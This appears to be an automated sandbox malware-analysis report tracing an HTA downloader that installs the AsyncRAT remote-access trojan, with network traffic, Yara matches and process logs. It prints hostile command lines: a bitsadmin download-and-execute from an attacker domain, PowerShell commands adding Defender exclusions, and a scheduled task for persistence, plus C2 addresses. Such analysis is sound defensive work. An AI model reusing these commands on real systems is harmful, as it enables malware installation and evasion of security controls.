                      Source: Yara matchFile source: 5.0.wininit.exe.3e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.wininit.exe.27df820.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\BIT6DEB.tmp, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\wininit.exe, type: DROPPED
                      Source: global trafficTCP traffic: 192.168.2.5:49906 -> 116.122.95.113:5234
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                      Source: Joe Sandbox ViewASN Name: SKB-ASSKBroadbandCoLtdKR SKB-ASSKBroadbandCoLtdKR
                      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: unknownDNS query: name: ip-api.com
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /wininit.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 15 Nov 2024 04:53:00 GMTRange: bytes=0-1119User-Agent: Microsoft BITS/7.8Host: 2k8u3.org
                      Source: global trafficHTTP traffic detected: GET /wininit.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 15 Nov 2024 04:53:00 GMTRange: bytes=1120-1912User-Agent: Microsoft BITS/7.8Host: 2k8u3.org
                      Source: global trafficHTTP traffic detected: GET /wininit.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 15 Nov 2024 04:53:00 GMTRange: bytes=1913-2137User-Agent: Microsoft BITS/7.8Host: 2k8u3.org
                      Source: global trafficHTTP traffic detected: GET /wininit.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 15 Nov 2024 04:53:00 GMTRange: bytes=2138-2213User-Agent: Microsoft BITS/7.8Host: 2k8u3.org
                      Source: global trafficHTTP traffic detected: GET /wininit.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 15 Nov 2024 04:53:00 GMTRange: bytes=2214-2340User-Agent: Microsoft BITS/7.8Host: 2k8u3.org
                      Source: global trafficHTTP traffic detected: GET /wininit.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 15 Nov 2024 04:53:00 GMTRange: bytes=2341-3228User-Agent: Microsoft BITS/7.8Host: 2k8u3.org
                      Source: global trafficHTTP traffic detected: GET /wininit.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 15 Nov 2024 04:53:00 GMTRange: bytes=3229-4391User-Agent: Microsoft BITS/7.8Host: 2k8u3.org
                      Source: global trafficHTTP traffic detected: GET /wininit.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 15 Nov 2024 04:53:00 GMTRange: bytes=4392-5869User-Agent: Microsoft BITS/7.8Host: 2k8u3.org
                      Source: global trafficHTTP traffic detected: GET /wininit.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 15 Nov 2024 04:53:00 GMTRange: bytes=5870-7427User-Agent: Microsoft BITS/7.8Host: 2k8u3.org
                      Source: global trafficHTTP traffic detected: GET /wininit.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 15 Nov 2024 04:53:00 GMTRange: bytes=7428-9501User-Agent: Microsoft BITS/7.8Host: 2k8u3.org
                      Source: global trafficHTTP traffic detected: GET /wininit.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 15 Nov 2024 04:53:00 GMTRange: bytes=9502-14292User-Agent: Microsoft BITS/7.8Host: 2k8u3.org
                      Source: global trafficHTTP traffic detected: GET /wininit.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 15 Nov 2024 04:53:00 GMTRange: bytes=14293-26900User-Agent: Microsoft BITS/7.8Host: 2k8u3.org
                      Source: global trafficHTTP traffic detected: GET /wininit.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 15 Nov 2024 04:53:00 GMTRange: bytes=26901-53755User-Agent: Microsoft BITS/7.8Host: 2k8u3.org
                      Source: global trafficHTTP traffic detected: GET /wininit.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Fri, 15 Nov 2024 04:53:00 GMTRange: bytes=53756-77823User-Agent: Microsoft BITS/7.8Host: 2k8u3.org
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: 2k8u3.org
                      Source: global trafficDNS traffic detected: DNS query: ip-api.com
                      Source: global trafficDNS traffic detected: DNS query: ddk.2k8u3.org
                      Source: bitsadmin.exe, 00000001.00000002.2433341737.0000000002E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3278495341.000001BA68CA6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2480849296.000001BA6955B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2111634556.000001BA6955B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2458818627.000001BA6955B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2432558607.000001BA6955B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3279269441.000001BA6955B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.3280358456.000001BA6E20F000.00000004.00000020.00020000.00000000.sdmp, downloader2.htaString found in binary or memory: http://2k8u3.org/wininit.exe
                      Source: edb.log.3.drString found in binary or memory: http://2k8u3.org/wininit.exe/C:
                      Source: bitsadmin.exe, 00000001.00000002.2433341737.0000000002E4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://2k8u3.org/wininit.exeC:
                      Source: svchost.exe, 00000003.00000002.3280717372.000001BA6E28D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                      Source: qmgr.db.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                      Source: qmgr.db.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                      Source: qmgr.db.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                      Source: qmgr.db.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                      Source: qmgr.db.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                      Source: qmgr.db.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                      Source: edb.log.3.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                      Source: wininit.exe, 00000005.00000002.3282808526.0000000002711000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                      Source: svchost.exe, 00000003.00000003.2432558607.000001BA6955B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2432595859.000001BA6955C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2432558607.000001BA6951A000.00000004.00000020.00020000.00000000.sdmp, wininit.exe, 00000005.00000002.3282808526.0000000002711000.00000004.00000800.00020000.00000000.sdmp, wininit.exe, 00000005.00000000.2434580556.00000000003E2000.00000002.00000001.01000000.00000009.sdmp, wininit.exe, 00000005.00000002.3282808526.00000000027BC000.00000004.00000800.00020000.00000000.sdmp, BIT6DEB.tmp.3.dr, wininit.exe.5.drString found in binary or memory: http://ip-api.com/line/?fields=hosting
                      Source: powershell.exe, 00000007.00000002.2650109516.0000024B1FEE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2741207270.000001A295FEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2882061125.00000262B2F0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3057537963.000001B410069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 0000000E.00000002.2936521448.000001B400229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000007.00000002.2632232562.0000024B10099000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2692129837.000001A2861AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2789265627.00000262A30C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2936521448.000001B400229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: wininit.exe, 00000005.00000002.3282808526.0000000002711000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2632232562.0000024B0FE71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2692129837.000001A285F81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2789265627.00000262A2EA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2936521448.000001B400001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000007.00000002.2632232562.0000024B10099000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2692129837.000001A2861AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2789265627.00000262A30C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2936521448.000001B400229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: powershell.exe, 0000000E.00000002.2936521448.000001B400229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: powershell.exe, 0000000E.00000002.3079855605.000001B46E55F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
                      Source: powershell.exe, 00000007.00000002.2632232562.0000024B0FE71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2692129837.000001A285F81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2789265627.00000262A2EA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2936521448.000001B400001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                      Source: powershell.exe, 0000000E.00000002.3057537963.000001B410069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 0000000E.00000002.3057537963.000001B410069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 0000000E.00000002.3057537963.000001B410069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: edb.log.3.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                      Source: svchost.exe, 00000003.00000003.2048029550.000001BA6E0C0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                      Source: powershell.exe, 0000000E.00000002.2936521448.000001B400229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000007.00000002.2650109516.0000024B1FEE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2741207270.000001A295FEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2882061125.00000262B2F0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3057537963.000001B410069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: qmgr.db.3.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:

                      Operating System Destruction

                      barindex
                      Protects its processes via BreakOnTermination flag
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess information set: 01 00 00 00 Jump to behavior

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 5.0.wininit.exe.3e0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 5.2.wininit.exe.27df820.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 5.2.wininit.exe.27df820.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000003.00000003.2432558607.000001BA6955B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000005.00000000.2434580556.00000000003E2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000003.00000003.2432595859.000001BA6955C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000003.00000003.2432558607.000001BA6951A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: 00000005.00000002.3282808526.00000000027BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\BIT6DEB.tmp, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: C:\Users\user\AppData\Roaming\wininit.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeCode function: 5_2_00007FF848AE72725_2_00007FF848AE7272
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeCode function: 5_2_00007FF848AE17195_2_00007FF848AE1719
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeCode function: 5_2_00007FF848AE9B095_2_00007FF848AE9B09
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeCode function: 5_2_00007FF848AE60C65_2_00007FF848AE60C6
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeCode function: 5_2_00007FF848AE20F55_2_00007FF848AE20F5
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FF848BB2E117_2_00007FF848BB2E11
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FF848BD2E1112_2_00007FF848BD2E11
                      Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 18_2_00007FF848B0171918_2_00007FF848B01719
                      Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 18_2_00007FF848B012F818_2_00007FF848B012F8
                      Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 18_2_00007FF848B020F518_2_00007FF848B020F5
                      Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 18_2_00007FF848B0103818_2_00007FF848B01038
                      Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 19_2_00007FF848AE171919_2_00007FF848AE1719
                      Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 19_2_00007FF848AE12F819_2_00007FF848AE12F8
                      Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 19_2_00007FF848AE20F519_2_00007FF848AE20F5
                      Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 19_2_00007FF848AE103819_2_00007FF848AE1038
                      Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                      Source: 5.0.wininit.exe.3e0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 5.2.wininit.exe.27df820.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 5.2.wininit.exe.27df820.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000003.00000003.2432558607.000001BA6955B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000005.00000000.2434580556.00000000003E2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000003.00000003.2432595859.000001BA6955C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000003.00000003.2432558607.000001BA6951A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: 00000005.00000002.3282808526.00000000027BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: C:\Users\user\AppData\Local\Temp\BIT6DEB.tmp, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: C:\Users\user\AppData\Roaming\wininit.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                      Source: BIT6DEB.tmp.3.dr, YkVOnCxniKkBgIh2gN6pw5h2FMLgVXKlnmyboGGhhp52kCEnTF5yxtfgYAnkHI4yTcVMQfxkKEn5AvfECo.csCryptographic APIs: 'TransformFinalBlock'
                      Source: BIT6DEB.tmp.3.dr, Uc46tMpW2xEMTIR4OAhEZNCcXyin0mKKsXm6twuQU38Vw8qF8o9BxAy57IPqiAKHuxCz7pqr8cKV4Ula05.csCryptographic APIs: 'TransformFinalBlock'
                      Source: BIT6DEB.tmp.3.dr, Uc46tMpW2xEMTIR4OAhEZNCcXyin0mKKsXm6twuQU38Vw8qF8o9BxAy57IPqiAKHuxCz7pqr8cKV4Ula05.csCryptographic APIs: 'TransformFinalBlock'
                      Source: wininit.exe.5.dr, YkVOnCxniKkBgIh2gN6pw5h2FMLgVXKlnmyboGGhhp52kCEnTF5yxtfgYAnkHI4yTcVMQfxkKEn5AvfECo.csCryptographic APIs: 'TransformFinalBlock'
                      Source: wininit.exe.5.dr, Uc46tMpW2xEMTIR4OAhEZNCcXyin0mKKsXm6twuQU38Vw8qF8o9BxAy57IPqiAKHuxCz7pqr8cKV4Ula05.csCryptographic APIs: 'TransformFinalBlock'
                      Source: wininit.exe.5.dr, Uc46tMpW2xEMTIR4OAhEZNCcXyin0mKKsXm6twuQU38Vw8qF8o9BxAy57IPqiAKHuxCz7pqr8cKV4Ula05.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 5.2.wininit.exe.27df820.0.raw.unpack, YkVOnCxniKkBgIh2gN6pw5h2FMLgVXKlnmyboGGhhp52kCEnTF5yxtfgYAnkHI4yTcVMQfxkKEn5AvfECo.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 5.2.wininit.exe.27df820.0.raw.unpack, Uc46tMpW2xEMTIR4OAhEZNCcXyin0mKKsXm6twuQU38Vw8qF8o9BxAy57IPqiAKHuxCz7pqr8cKV4Ula05.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 5.2.wininit.exe.27df820.0.raw.unpack, Uc46tMpW2xEMTIR4OAhEZNCcXyin0mKKsXm6twuQU38Vw8qF8o9BxAy57IPqiAKHuxCz7pqr8cKV4Ula05.csCryptographic APIs: 'TransformFinalBlock'
                      Source: wininit.exe.5.dr, tbuIlvTcGLkYNSengIBQYlrDZOdSkzFCt38xFZ4C3HUowPPqW.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: wininit.exe.5.dr, tbuIlvTcGLkYNSengIBQYlrDZOdSkzFCt38xFZ4C3HUowPPqW.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: BIT6DEB.tmp.3.dr, tbuIlvTcGLkYNSengIBQYlrDZOdSkzFCt38xFZ4C3HUowPPqW.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: BIT6DEB.tmp.3.dr, tbuIlvTcGLkYNSengIBQYlrDZOdSkzFCt38xFZ4C3HUowPPqW.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 5.2.wininit.exe.27df820.0.raw.unpack, tbuIlvTcGLkYNSengIBQYlrDZOdSkzFCt38xFZ4C3HUowPPqW.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                      Source: 5.2.wininit.exe.27df820.0.raw.unpack, tbuIlvTcGLkYNSengIBQYlrDZOdSkzFCt38xFZ4C3HUowPPqW.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: classification engineClassification label: mal100.troj.evad.winHTA@24/27@3/4
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeFile created: C:\Users\user\AppData\Roaming\wininit.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\wininit.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4760:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6576:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1684:120:WilError_03
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeMutant created: \Sessions\1\BaseNamedObjects\iNnOGzR9ec7oF0Vp
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6368:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3936:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5900:120:WilError_03
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\BIT6DEB.tmpJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: downloader2.htaReversingLabs: Detection: 31%
                      Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\downloader2.hta"
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://2k8u3.org/wininit.exe C:\Users\user\AppData\Local\Temp\wininit.exe
                      Source: C:\Windows\SysWOW64\bitsadmin.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Users\user\AppData\Local\Temp\wininit.exe "C:\Users\user\AppData\Local\Temp\wininit.exe"
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\wininit.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'wininit.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\wininit.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'wininit.exe'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "wininit" /tr "C:\Users\user\AppData\Roaming\wininit.exe"
                      Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\wininit.exe C:\Users\user\AppData\Roaming\wininit.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\wininit.exe "C:\Users\user\AppData\Roaming\wininit.exe"
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\System32\bitsadmin.exe" /transfer 8 http://2k8u3.org/wininit.exe C:\Users\user\AppData\Local\Temp\wininit.exeJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Users\user\AppData\Local\Temp\wininit.exe "C:\Users\user\AppData\Local\Temp\wininit.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\wininit.exe'Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'wininit.exe'Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\wininit.exe'Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'wininit.exe'Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\wininit.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "wininit" /tr "C:\Users\user\AppData\Roaming\wininit.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
